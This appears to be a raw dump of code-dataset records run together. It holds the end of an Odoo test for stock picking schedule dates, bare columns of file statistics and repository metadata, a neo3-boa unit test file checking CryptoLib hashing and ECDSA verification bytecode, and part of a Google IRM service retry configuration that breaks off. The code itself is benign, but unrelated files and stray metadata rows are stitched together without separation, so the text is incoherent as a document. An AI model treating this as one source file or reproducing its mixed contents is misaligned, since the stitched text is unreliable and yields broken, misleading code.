self.assertTrue(abs(pack_min_date - pack_date) <= timedelta(seconds=1), 'Schedule date of pack type picking should be equal to: Schedule date of ship type picking - pull rule delay.')
# Check schedule date of pick type picking
pick = order.picking_ids.filtered(lambda r: r.picking_type_id == self.warehouse_1.pick_type_id)
pick_min_date = fields.Datetime.from_string(pick.scheduled_date)
pick_date = pack_date - timedelta(days=pick.move_lines[0].rule_id.delay)
self.assertTrue(abs(pick_min_date - pick_date) <= timedelta(seconds=1), 'Schedule date of pick type picking should be equal to: Schedule date of pack type picking - pull rule delay.')
def test_02_if_propagate_date(self):
""" In order to check schedule dates, set product's Customer Lead Time
and warehouse route's delay with propagate True in stock rules"""
#Example :
#-> set 'propagate_date' = True in stock rules
#-> set propagate_date_minimum_delta = 5 days
#-> Set Warehouse with Outgoing Shipments : pick + pack + ship
#-> Set delay and propagate_date_minimum_delta on stock rules : 5 days and propagate_date = True
#-> Set Customer Lead Time on product : 30 days
#-> Create an SO and confirm it with confirmation Date : 12/18/2018
#-> Pickings : OUT -> Scheduled Date : 01/12/2019
# PACK -> Scheduled Date : 01/07/2019
# PICK -> Scheduled Date : 01/02/2019
#-> Now, change date of pick = +5 days
#-> Scheduled Date should be changed:
# OUT -> Scheduled Date : 01/17/2019
# PACK -> Scheduled Date : 01/12/2019
# PICK -> Scheduled Date : 01/07/2019
# set the propagate_date and
# set propagate_date_minimum_delta = 5 in the stock rule
# Update warehouse_1 with Outgoing Shippings pick + pack + ship
self.warehouse_1.write({'delivery_steps': 'pick_pack_ship'})
# Set delay on pull rule
self.warehouse_1.delivery_route_id.rule_ids.write({'delay': 5, 'propagate_date': True, 'propagate_date_minimum_delta': 5})
# Update the product_1 with type and Customer Lead Time
self.product_1.write({'type': 'product',
'sale_delay': 30.0})
# Now, create sale order of product_1 with customer_lead set on product
order = self.env['sale.order'].create({
'partner_id': self.partner_1.id,
'partner_invoice_id': self.partner_1.id,
'partner_shipping_id': self.partner_1.id,
'pricelist_id': self.env.ref('product.list0').id,
'picking_policy': 'direct',
'warehouse_id': self.warehouse_1.id,
'order_line': [(0, 0, {'name': self.product_1.name,
'product_id': self.product_1.id,
'product_uom_qty': 5,
'product_uom': self.uom_unit.id,
'customer_lead': self.product_1.sale_delay})]})
# Confirm our standard sale order
order.action_confirm()
# Check the picking crated or not
self.assertTrue(order.picking_ids, "Pickings should be created.")
# Check schedule date of ship type picking
out = order.picking_ids.filtered(lambda r: r.picking_type_id == self.warehouse_1.out_type_id)
out_min_date = out.scheduled_date
out_date = order.date_order + timedelta(days=self.product_1.sale_delay) - timedelta(days=out.move_lines[0].rule_id.delay)
self.assertTrue(abs(out_min_date - out_date) <= timedelta(seconds=1), 'Schedule date of ship type picking should be equal to: order date + Customer Lead Time - pull rule delay.')
# Check schedule date of pack type picking
pack = order.picking_ids.filtered(lambda r: r.picking_type_id == self.warehouse_1.pack_type_id)
pack_min_date = pack.scheduled_date
pack_date = out_date - timedelta(days=pack.move_lines[0].rule_id.delay)
self.assertTrue(abs(pack_min_date - pack_date) <= timedelta(seconds=1), 'Schedule date of pack type picking should be equal to: Schedule date of ship type picking - pull rule delay.')
# Check schedule date of pick type picking
pick = order.picking_ids.filtered(lambda r: r.picking_type_id == self.warehouse_1.pick_type_id)
pick_min_date = pick.scheduled_date
pick_date = pack_date - timedelta(days=pick.move_lines[0].rule_id.delay)
self.assertTrue(abs(pick_min_date - pick_date) <= timedelta(seconds=1), 'Schedule date of pick type picking should be equal to: Schedule date of pack type picking - pull rule delay.')
# Now change the schedule date of pick
# Note : pack and out has change scheduled_date automatically based on delay set on pick
pick.write({'scheduled_date': pick_min_date + timedelta(days=5)})
# Now check scheduled_date of pack and out are changed or not based on propagate is true on rules?
self.assertEquals(pack.scheduled_date, (pack_min_date + timedelta(days=5)),
'Schedule date of pack should be changed based on delay.')
self.assertEquals(out.scheduled_date, (out_min_date + timedelta(days=5)),
'Schedule date of out should be changed based on delay.')
def test_03_no_propagate_date(self):
""" In order to check schedule dates, set product's Customer Lead Time
and warehouse route's delay with propagate False in stock rule"""
#Example :
#-> Set Warehouse with Outgoing Shipments : pick + pack + ship
#-> Set delay on stock rules : 5 days and propagate = False
#-> Set Customer Lead Time on product : 30 days
#-> Create an SO and confirm it with confirmation Date : 12/18/2018
#-> Pickings : OUT -> Scheduled Date : 01/12/2019
# PACK -> Scheduled Date : 01/07/2019
# PICK -> Scheduled Date : 01/02/2019
#-> Now, change date of pick = +5 days
#-> Scheduled Date should be not changed:
# OUT -> Scheduled Date : 01/12/2019
# PACK -> Scheduled Date : 01/07/2019
# PICK -> Scheduled Date : 01/07/2019
# Update warehouse_1 with Outgoing Shippings pick + pack + ship
self.warehouse_1.write({'delivery_steps': 'pick_pack_ship'})
# Set delay on pull rule
for pull_rule in self.warehouse_1.delivery_route_id.rule_ids:
pull_rule.write({'delay': 5, 'propagate_date': False})
# Update the product_1 with type and Customer Lead Time
self.product_1.write({'type': 'product',
'sale_delay': 30.0})
#Create sale order of product_1
order = self.env['sale.order'].create({
'partner_id': self.partner_1.id,
'partner_invoice_id': self.partner_1.id,
'partner_shipping_id': self.partner_1.id,
'pricelist_id': self.env.ref('product.list0').id,
'picking_policy': 'direct',
'warehouse_id': self.warehouse_1.id,
'order_line': [(0, 0, {'name': self.product_1.name,
'product_id': self.product_1.id,
'product_uom_qty': 5,
'product_uom': self.uom_unit.id,
'customer_lead': self.product_1.sale_delay})]})
# Confirm our standard sale order
order.action_confirm()
# Check the picking crated or not
self.assertTrue(order.picking_ids, "Pickings should be created.")
# Check schedule date of ship type picking
out = order.picking_ids.filtered(lambda r: r.picking_type_id == self.warehouse_1.out_type_id)
out_min_date = out.scheduled_date
out_date = order.date_order + timedelta(days=self.product_1.sale_delay) - timedelta(days=out.move_lines[0].rule_id.delay)
self.assertTrue(abs(out_min_date - out_date) <= timedelta(seconds=1), 'Schedule date of ship type picking should be equal to: order date + Customer Lead Time - pull rule delay.')
# Check schedule date of pack type picking
pack = order.picking_ids.filtered(lambda r: r.picking_type_id == self.warehouse_1.pack_type_id)
pack_min_date = pack.scheduled_date
pack_date = out_date - timedelta(days=pack.move_lines[0].rule_id.delay)
self.assertTrue(abs(pack_min_date - pack_date) <= timedelta(seconds=1), 'Schedule date of pack type picking should be equal to: Schedule date of ship type picking - pull rule delay.')
# Check schedule date of pick type picking
pick = order.picking_ids.filtered(lambda r: r.picking_type_id == self.warehouse_1.pick_type_id)
pick_min_date = pick.scheduled_date
pick_date = pack_date - timedelta(days=pick.move_lines[0].rule_id.delay)
self.assertTrue(abs(pick_min_date - pick_date) <= timedelta(seconds=1), 'Schedule date of pick type picking should be equal to: Schedule date of pack type picking - pull rule delay.')
# Now change the schedule date of pick
pick.write({'scheduled_date': pick_min_date + timedelta(days=5)})
# Now check scheduled_date of pack and out are changed or not based on propagate is false on rules?
self.assertEquals(pack.scheduled_date, pack_min_date, 'Schedule date of pack should not be changed.')
self.assertEquals(out.scheduled_date, out_min_date, 'Schedule date of out should not be changed.')
| 54.180077
| 191
| 0.639629
| 1,910
| 14,141
| 4.542408
| 0.081675
| 0.024896
| 0.051637
| 0.023974
| 0.903527
| 0.881512
| 0.853273
| 0.835178
| 0.809359
| 0.809359
| 0
| 0.023846
| 0.26455
| 14,141
| 260
| 192
| 54.388462
| 0.810385
| 0.255781
| 0
| 0.75969
| 0
| 0.069767
| 0.226043
| 0.002697
| 0
| 0
| 0
| 0
| 0.139535
| 1
| 0.03876
| false
| 0
| 0.023256
| 0
| 0.069767
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
45051ce9c2a245b0eb9d05224f7f026226f49745
| 18,489
|
py
|
Python
|
boa3_test/tests/compiler_tests/test_native/test_cryptolib.py
|
OnBlockIO/neo3-boa
|
cb317292a67532a52ed26f2b0f0f7d0b10ac5f5f
|
[
"Apache-2.0"
] | 25
|
2020-07-22T19:37:43.000Z
|
2022-03-08T03:23:55.000Z
|
boa3_test/tests/compiler_tests/test_native/test_cryptolib.py
|
OnBlockIO/neo3-boa
|
cb317292a67532a52ed26f2b0f0f7d0b10ac5f5f
|
[
"Apache-2.0"
] | 419
|
2020-04-23T17:48:14.000Z
|
2022-03-31T13:17:45.000Z
|
boa3_test/tests/compiler_tests/test_native/test_cryptolib.py
|
OnBlockIO/neo3-boa
|
cb317292a67532a52ed26f2b0f0f7d0b10ac5f5f
|
[
"Apache-2.0"
] | 15
|
2020-05-21T21:54:24.000Z
|
2021-11-18T06:17:24.000Z
|
import hashlib
from boa3 import constants
from boa3.boa3 import Boa3
from boa3.exception import CompilerError
from boa3.model.builtin.interop.interop import Interop
from boa3.model.type.type import Type
from boa3.neo.vm.opcode.Opcode import Opcode
from boa3.neo.vm.type.Integer import Integer
from boa3.neo.vm.type.String import String
from boa3.neo3.contracts.contracttypes import CallFlags
from boa3.neo3.contracts.namedcurve import NamedCurve
from boa3_test.tests.boa_test import BoaTest
from boa3_test.tests.test_classes.testengine import TestEngine
class TestCryptoLibClass(BoaTest):
default_folder: str = 'test_sc/native_test/cryptolib'
ecpoint_init = (
Opcode.CONVERT + Type.bytes.stack_item
+ Opcode.DUP
+ Opcode.ISNULL
+ Opcode.JMPIF + Integer(8).to_byte_array()
+ Opcode.DUP
+ Opcode.SIZE
+ Opcode.PUSHINT8 + Integer(33).to_byte_array(signed=True)
+ Opcode.JMPEQ + Integer(3).to_byte_array()
+ Opcode.THROW
)
def test_ripemd160_str(self):
path = self.get_contract_path('Ripemd160Str.py')
engine = TestEngine()
expected_result = hashlib.new('ripemd160', b'unit test')
result = self.run_smart_contract(engine, path, 'Main', 'unit test')
self.assertEqual(expected_result.digest(), result)
expected_result = hashlib.new('ripemd160', b'')
result = self.run_smart_contract(engine, path, 'Main', '')
self.assertEqual(expected_result.digest(), result)
def test_ripemd160_int(self):
path = self.get_contract_path('Ripemd160Int.py')
engine = TestEngine()
expected_result = hashlib.new('ripemd160', Integer(10).to_byte_array())
result = self.run_smart_contract(engine, path, 'Main')
self.assertEqual(expected_result.digest(), result)
def test_ripemd160_bool(self):
path = self.get_contract_path('Ripemd160Bool.py')
engine = TestEngine()
expected_result = hashlib.new('ripemd160', Integer(1).to_byte_array())
result = self.run_smart_contract(engine, path, 'Main')
self.assertEqual(expected_result.digest(), result)
def test_ripemd160_bytes(self):
path = self.get_contract_path('Ripemd160Bytes.py')
engine = TestEngine()
expected_result = hashlib.new('ripemd160', b'unit test')
result = self.run_smart_contract(engine, path, 'Main')
self.assertEqual(expected_result.digest(), result)
def test_ripemd160_too_many_parameters(self):
path = self.get_contract_path('Ripemd160TooManyArguments.py')
self.assertCompilerLogs(CompilerError.UnexpectedArgument, path)
def test_ripemd160_too_few_parameters(self):
path = self.get_contract_path('Ripemd160TooFewArguments.py')
self.assertCompilerLogs(CompilerError.UnfilledArgument, path)
def test_sha256_str(self):
path = self.get_contract_path('Sha256Str.py')
engine = TestEngine()
expected_result = hashlib.sha256(b'unit test')
result = self.run_smart_contract(engine, path, 'Main', 'unit test')
self.assertEqual(expected_result.digest(), result)
expected_result = hashlib.sha256(b'')
result = self.run_smart_contract(engine, path, 'Main', '')
self.assertEqual(expected_result.digest(), result)
def test_sha256_int(self):
path = self.get_contract_path('Sha256Int.py')
engine = TestEngine()
expected_result = hashlib.sha256(Integer(10).to_byte_array())
result = self.run_smart_contract(engine, path, 'Main')
self.assertEqual(expected_result.digest(), result)
def test_sha256_bool(self):
path = self.get_contract_path('Sha256Bool.py')
engine = TestEngine()
expected_result = hashlib.sha256(Integer(1).to_byte_array())
result = self.run_smart_contract(engine, path, 'Main')
self.assertEqual(expected_result.digest(), result)
def test_sha256_bytes(self):
path = self.get_contract_path('Sha256Bytes.py')
engine = TestEngine()
expected_result = hashlib.sha256(b'unit test')
result = self.run_smart_contract(engine, path, 'Main')
self.assertEqual(expected_result.digest(), result)
def test_sha256_too_many_parameters(self):
path = self.get_contract_path('Sha256TooManyArguments.py')
self.assertCompilerLogs(CompilerError.UnexpectedArgument, path)
def test_sha256_too_few_parameters(self):
path = self.get_contract_path('Sha256TooFewArguments.py')
self.assertCompilerLogs(CompilerError.UnfilledArgument, path)
def test_verify_with_ecdsa(self):
path = self.get_contract_path('VerifyWithECDsa.py')
Boa3.compile(path)
def test_verify_with_ecdsa_secp256r1_str(self):
byte_input1 = b'0123456789ABCDEFGHIJKLMNOPQRSTUVW'
byte_input2 = b'signature'
string = b'unit test'
named_curve = Integer(NamedCurve.SECP256R1).to_byte_array(signed=True, min_length=1)
function_id = String(Interop.VerifyWithECDsa._sys_call).to_bytes()
call_flag = Integer(CallFlags.ALL).to_byte_array(signed=True, min_length=1)
expected_output = (
Opcode.PUSHDATA1
+ Integer(len(named_curve)).to_byte_array(min_length=1)
+ named_curve
+ Opcode.CONVERT + Type.int.stack_item
+ Opcode.PUSHDATA1
+ Integer(len(byte_input2)).to_byte_array(min_length=1)
+ byte_input2
+ Opcode.PUSHDATA1
+ Integer(len(byte_input1)).to_byte_array(min_length=1)
+ byte_input1
+ self.ecpoint_init
+ Opcode.PUSHDATA1
+ Integer(len(string)).to_byte_array(min_length=1)
+ string
+ Opcode.PUSH4
+ Opcode.PACK
+ Opcode.PUSHDATA1
+ Integer(len(call_flag)).to_byte_array(min_length=1)
+ call_flag
+ Opcode.PUSHDATA1
+ Integer(len(function_id)).to_byte_array() + function_id
+ Opcode.PUSHDATA1
+ Integer(len(constants.CRYPTO_SCRIPT)).to_byte_array() + constants.CRYPTO_SCRIPT
+ Opcode.SYSCALL
+ Interop.CallContract.interop_method_hash
+ Opcode.DROP
+ Opcode.RET
)
path = self.get_contract_path('VerifyWithECDsaSecp256r1Str.py')
output = Boa3.compile(path)
self.assertEqual(expected_output, output)
def test_verify_with_ecdsa_secp256r1_bool(self):
byte_input1 = b'0123456789ABCDEFGHIJKLMNOPQRSTUVW'
byte_input2 = b'signature'
named_curve = Integer(NamedCurve.SECP256R1).to_byte_array(signed=True, min_length=1)
function_id = String(Interop.VerifyWithECDsa._sys_call).to_bytes()
call_flag = Integer(CallFlags.ALL).to_byte_array(signed=True, min_length=1)
expected_output = (
Opcode.PUSHDATA1
+ Integer(len(named_curve)).to_byte_array(min_length=1)
+ named_curve
+ Opcode.CONVERT + Type.int.stack_item
+ Opcode.PUSHDATA1
+ Integer(len(byte_input2)).to_byte_array(min_length=1)
+ byte_input2
+ Opcode.PUSHDATA1
+ Integer(len(byte_input1)).to_byte_array(min_length=1)
+ byte_input1
+ self.ecpoint_init
+ Opcode.PUSH0
+ Opcode.PUSH4
+ Opcode.PACK
+ Opcode.PUSHDATA1
+ Integer(len(call_flag)).to_byte_array(min_length=1)
+ call_flag
+ Opcode.PUSHDATA1
+ Integer(len(function_id)).to_byte_array() + function_id
+ Opcode.PUSHDATA1
+ Integer(len(constants.CRYPTO_SCRIPT)).to_byte_array() + constants.CRYPTO_SCRIPT
+ Opcode.SYSCALL
+ Interop.CallContract.interop_method_hash
+ Opcode.DROP
+ Opcode.RET
)
path = self.get_contract_path('VerifyWithECDsaSecp256r1Bool.py')
output = Boa3.compile(path)
self.assertEqual(expected_output, output)
def test_verify_with_ecdsa_secp256r1_int(self):
byte_input1 = b'0123456789ABCDEFGHIJKLMNOPQRSTUVW'
byte_input2 = b'signature'
named_curve = Integer(NamedCurve.SECP256R1).to_byte_array(signed=True, min_length=1)
function_id = String(Interop.VerifyWithECDsa._sys_call).to_bytes()
call_flag = Integer(CallFlags.ALL).to_byte_array(signed=True, min_length=1)
expected_output = (
Opcode.PUSHDATA1
+ Integer(len(named_curve)).to_byte_array(min_length=1)
+ named_curve
+ Opcode.CONVERT + Type.int.stack_item
+ Opcode.PUSHDATA1
+ Integer(len(byte_input2)).to_byte_array(min_length=1)
+ byte_input2
+ Opcode.PUSHDATA1
+ Integer(len(byte_input1)).to_byte_array(min_length=1)
+ byte_input1
+ self.ecpoint_init
+ Opcode.PUSH10
+ Opcode.PUSH4
+ Opcode.PACK
+ Opcode.PUSHDATA1
+ Integer(len(call_flag)).to_byte_array(min_length=1)
+ call_flag
+ Opcode.PUSHDATA1
+ Integer(len(function_id)).to_byte_array() + function_id
+ Opcode.PUSHDATA1
+ Integer(len(constants.CRYPTO_SCRIPT)).to_byte_array() + constants.CRYPTO_SCRIPT
+ Opcode.SYSCALL
+ Interop.CallContract.interop_method_hash
+ Opcode.DROP
+ Opcode.RET
)
path = self.get_contract_path('VerifyWithECDsaSecp256r1Int.py')
output = Boa3.compile(path)
self.assertEqual(expected_output, output)
def test_verify_with_ecdsa_secp256r1_bytes(self):
byte_input1 = b'0123456789ABCDEFGHIJKLMNOPQRSTUVW'
byte_input2 = b'signature'
string = b'unit test'
named_curve = Integer(NamedCurve.SECP256R1).to_byte_array(signed=True, min_length=1)
function_id = String(Interop.VerifyWithECDsa._sys_call).to_bytes()
call_flag = Integer(CallFlags.ALL).to_byte_array(signed=True, min_length=1)
expected_output = (
Opcode.PUSHDATA1
+ Integer(len(named_curve)).to_byte_array(min_length=1)
+ named_curve
+ Opcode.CONVERT + Type.int.stack_item
+ Opcode.PUSHDATA1
+ Integer(len(byte_input2)).to_byte_array(min_length=1)
+ byte_input2
+ Opcode.PUSHDATA1
+ Integer(len(byte_input1)).to_byte_array(min_length=1)
+ byte_input1
+ self.ecpoint_init
+ Opcode.PUSHDATA1
+ Integer(len(string)).to_byte_array(min_length=1)
+ string
+ Opcode.PUSH4
+ Opcode.PACK
+ Opcode.PUSHDATA1
+ Integer(len(call_flag)).to_byte_array(min_length=1)
+ call_flag
+ Opcode.PUSHDATA1
+ Integer(len(function_id)).to_byte_array() + function_id
+ Opcode.PUSHDATA1
+ Integer(len(constants.CRYPTO_SCRIPT)).to_byte_array() + constants.CRYPTO_SCRIPT
+ Opcode.SYSCALL
+ Interop.CallContract.interop_method_hash
+ Opcode.DROP
+ Opcode.RET
)
path = self.get_contract_path('VerifyWithECDsaSecp256r1Bytes.py')
output = Boa3.compile(path)
self.assertEqual(expected_output, output)
def test_verify_with_ecdsa_secp256r1_mismatched_type(self):
path = self.get_contract_path('VerifyWithECDsaSecp256r1MismatchedType.py')
self.assertCompilerLogs(CompilerError.MismatchedTypes, path)
def test_verify_with_ecdsa_secp256k1_str(self):
byte_input1 = b'0123456789ABCDEFGHIJKLMNOPQRSTUVW'
byte_input2 = b'signature'
string = b'unit test'
named_curve = Integer(NamedCurve.SECP256K1).to_byte_array(signed=True, min_length=1)
function_id = String(Interop.VerifyWithECDsa._sys_call).to_bytes()
call_flag = Integer(CallFlags.ALL).to_byte_array(signed=True, min_length=1)
expected_output = (
Opcode.PUSHDATA1
+ Integer(len(named_curve)).to_byte_array(min_length=1)
+ named_curve
+ Opcode.CONVERT + Type.int.stack_item
+ Opcode.PUSHDATA1
+ Integer(len(byte_input2)).to_byte_array(min_length=1)
+ byte_input2
+ Opcode.PUSHDATA1
+ Integer(len(byte_input1)).to_byte_array(min_length=1)
+ byte_input1
+ self.ecpoint_init
+ Opcode.PUSHDATA1
+ Integer(len(string)).to_byte_array(min_length=1)
+ string
+ Opcode.PUSH4
+ Opcode.PACK
+ Opcode.PUSHDATA1
+ Integer(len(call_flag)).to_byte_array() + call_flag
+ Opcode.PUSHDATA1
+ Integer(len(function_id)).to_byte_array() + function_id
+ Opcode.PUSHDATA1
+ Integer(len(constants.CRYPTO_SCRIPT)).to_byte_array() + constants.CRYPTO_SCRIPT
+ Opcode.SYSCALL
+ Interop.CallContract.interop_method_hash
+ Opcode.DROP
+ Opcode.RET
)
path = self.get_contract_path('VerifyWithECDsaSecp256k1Str.py')
output = Boa3.compile(path)
self.assertEqual(expected_output, output)
def test_verify_with_ecdsa_secp256k1_bool(self):
byte_input1 = b'0123456789ABCDEFGHIJKLMNOPQRSTUVW'
byte_input2 = b'signature'
named_curve = Integer(NamedCurve.SECP256K1).to_byte_array(signed=True, min_length=1)
function_id = String(Interop.VerifyWithECDsa._sys_call).to_bytes()
call_flag = Integer(CallFlags.ALL).to_byte_array(signed=True, min_length=1)
expected_output = (
Opcode.PUSHDATA1
+ Integer(len(named_curve)).to_byte_array(min_length=1)
+ named_curve
+ Opcode.CONVERT + Type.int.stack_item
+ Opcode.PUSHDATA1
+ Integer(len(byte_input2)).to_byte_array(min_length=1)
+ byte_input2
+ Opcode.PUSHDATA1
+ Integer(len(byte_input1)).to_byte_array(min_length=1)
+ byte_input1
+ self.ecpoint_init
+ Opcode.PUSH0
+ Opcode.PUSH4
+ Opcode.PACK
+ Opcode.PUSHDATA1
+ Integer(len(call_flag)).to_byte_array() + call_flag
+ Opcode.PUSHDATA1
+ Integer(len(function_id)).to_byte_array() + function_id
+ Opcode.PUSHDATA1
+ Integer(len(constants.CRYPTO_SCRIPT)).to_byte_array() + constants.CRYPTO_SCRIPT
+ Opcode.SYSCALL
+ Interop.CallContract.interop_method_hash
+ Opcode.DROP
+ Opcode.RET
)
path = self.get_contract_path('VerifyWithECDsaSecp256k1Bool.py')
output = Boa3.compile(path)
self.assertEqual(expected_output, output)
def test_verify_with_ecdsa_secp256k1_int(self):
byte_input1 = b'0123456789ABCDEFGHIJKLMNOPQRSTUVW'
byte_input2 = b'signature'
named_curve = Integer(NamedCurve.SECP256K1).to_byte_array(signed=True, min_length=1)
function_id = String(Interop.VerifyWithECDsa._sys_call).to_bytes()
call_flag = Integer(CallFlags.ALL).to_byte_array(signed=True, min_length=1)
expected_output = (
Opcode.PUSHDATA1
+ Integer(len(named_curve)).to_byte_array(min_length=1)
+ named_curve
+ Opcode.CONVERT + Type.int.stack_item
+ Opcode.PUSHDATA1
+ Integer(len(byte_input2)).to_byte_array(min_length=1)
+ byte_input2
+ Opcode.PUSHDATA1
+ Integer(len(byte_input1)).to_byte_array(min_length=1)
+ byte_input1
+ self.ecpoint_init
+ Opcode.PUSH10
+ Opcode.PUSH4
+ Opcode.PACK
+ Opcode.PUSHDATA1
+ Integer(len(call_flag)).to_byte_array() + call_flag
+ Opcode.PUSHDATA1
+ Integer(len(function_id)).to_byte_array() + function_id
+ Opcode.PUSHDATA1
+ Integer(len(constants.CRYPTO_SCRIPT)).to_byte_array() + constants.CRYPTO_SCRIPT
+ Opcode.SYSCALL
+ Interop.CallContract.interop_method_hash
+ Opcode.DROP
+ Opcode.RET
)
path = self.get_contract_path('VerifyWithECDsaSecp256k1Int.py')
output = Boa3.compile(path)
self.assertEqual(expected_output, output)
def test_verify_with_ecdsa_secp256k1_bytes(self):
byte_input1 = b'0123456789ABCDEFGHIJKLMNOPQRSTUVW'
byte_input2 = b'signature'
string = b'unit test'
named_curve = Integer(NamedCurve.SECP256K1).to_byte_array(signed=True, min_length=1)
function_id = String(Interop.VerifyWithECDsa._sys_call).to_bytes()
call_flag = Integer(CallFlags.ALL).to_byte_array(signed=True, min_length=1)
expected_output = (
Opcode.PUSHDATA1
+ Integer(len(named_curve)).to_byte_array(min_length=1)
+ named_curve
+ Opcode.CONVERT + Type.int.stack_item
+ Opcode.PUSHDATA1
+ Integer(len(byte_input2)).to_byte_array(min_length=1)
+ byte_input2
+ Opcode.PUSHDATA1
+ Integer(len(byte_input1)).to_byte_array(min_length=1)
+ byte_input1
+ self.ecpoint_init
+ Opcode.PUSHDATA1
+ Integer(len(string)).to_byte_array(min_length=1)
+ string
+ Opcode.PUSH4
+ Opcode.PACK
+ Opcode.PUSHDATA1
+ Integer(len(call_flag)).to_byte_array() + call_flag
+ Opcode.PUSHDATA1
+ Integer(len(function_id)).to_byte_array() + function_id
+ Opcode.PUSHDATA1
+ Integer(len(constants.CRYPTO_SCRIPT)).to_byte_array() + constants.CRYPTO_SCRIPT
+ Opcode.SYSCALL
+ Interop.CallContract.interop_method_hash
+ Opcode.DROP
+ Opcode.RET
)
path = self.get_contract_path('VerifyWithECDsaSecp256k1Bytes.py')
output = Boa3.compile(path)
self.assertEqual(expected_output, output)
def test_verify_with_ecdsa_secp256k1_mismatched_type(self):
path = self.get_contract_path('VerifyWithECDsaSecp256k1MismatchedType.py')
self.assertCompilerLogs(CompilerError.MismatchedTypes, path)
| 41.735892
| 93
| 0.641733
| 2,051
| 18,489
| 5.498294
| 0.071185
| 0.039904
| 0.073158
| 0.115279
| 0.891283
| 0.885874
| 0.865301
| 0.843487
| 0.805179
| 0.780704
| 0
| 0.036081
| 0.26248
| 18,489
| 442
| 94
| 41.830317
| 0.790921
| 0
| 0
| 0.785894
| 0
| 0
| 0.059711
| 0.039213
| 0
| 0
| 0
| 0
| 0.060453
| 1
| 0.057935
| false
| 0
| 0.032746
| 0
| 0.098237
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4512724738ffab84e8982d9c40bc09c650e381b5
| 7,519
|
py
|
Python
|
google/cloud/irm_v1alpha2/gapic/incident_service_client_config.py
|
renovate-bot/python-irm
|
9006000797ef55bcba14e8cb156e4430645a2c9e
|
[
"Apache-2.0"
] | 2
|
2021-06-04T06:16:05.000Z
|
2021-10-07T21:29:26.000Z
|
google/cloud/irm_v1alpha2/gapic/incident_service_client_config.py
|
renovate-bot/python-irm
|
9006000797ef55bcba14e8cb156e4430645a2c9e
|
[
"Apache-2.0"
] | 40
|
2019-07-16T10:04:48.000Z
|
2020-01-20T09:04:59.000Z
|
google/cloud/irm_v1alpha2/gapic/incident_service_client_config.py
|
renovate-bot/python-irm
|
9006000797ef55bcba14e8cb156e4430645a2c9e
|
[
"Apache-2.0"
] | 4
|
2020-02-08T13:52:01.000Z
|
2020-11-03T11:02:29.000Z
|
config = {
"interfaces": {
"google.cloud.irm.v1alpha2.IncidentService": {
"retry_codes": {
"idempotent": ["DEADLINE_EXCEEDED", "UNAVAILABLE"],
"non_idempotent": [],
},
"retry_params": {
"default": {
"initial_retry_delay_millis": 100,
"retry_delay_multiplier": 1.3,
"max_retry_delay_millis": 60000,
"initial_rpc_timeout_millis": 20000,
"rpc_timeout_multiplier": 1.0,
"max_rpc_timeout_millis": 20000,
"total_timeout_millis": 600000,
}
},
"methods": {
"DeleteArtifact": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent",
"retry_params_name": "default",
},
"RequestIncidentRoleHandover": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "default",
},
"ConfirmIncidentRoleHandover": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "default",
},
"ForceIncidentRoleHandover": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "default",
},
"CreateIncident": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "default",
},
"GetIncident": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent",
"retry_params_name": "default",
},
"SearchIncidents": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent",
"retry_params_name": "default",
},
"UpdateIncident": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "default",
},
"SearchSimilarIncidents": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent",
"retry_params_name": "default",
},
"CreateAnnotation": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "default",
},
"ListAnnotations": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent",
"retry_params_name": "default",
},
"CreateTag": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "default",
},
"DeleteTag": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "default",
},
"ListTags": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent",
"retry_params_name": "default",
},
"CreateSignal": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "default",
},
"SearchSignals": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent",
"retry_params_name": "default",
},
"LookupSignal": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent",
"retry_params_name": "default",
},
"GetSignal": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent",
"retry_params_name": "default",
},
"UpdateSignal": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "default",
},
"EscalateIncident": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "default",
},
"CreateArtifact": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "default",
},
"ListArtifacts": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent",
"retry_params_name": "default",
},
"UpdateArtifact": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "default",
},
"SendShiftHandoff": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "default",
},
"CreateSubscription": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "default",
},
"UpdateSubscription": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "default",
},
"ListSubscriptions": {
"timeout_millis": 60000,
"retry_codes_name": "idempotent",
"retry_params_name": "default",
},
"DeleteSubscription": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "default",
},
"CreateIncidentRoleAssignment": {
"timeout_millis": 60000,
"retry_codes_name": "non_idempotent",
"retry_params_name": "default",
},
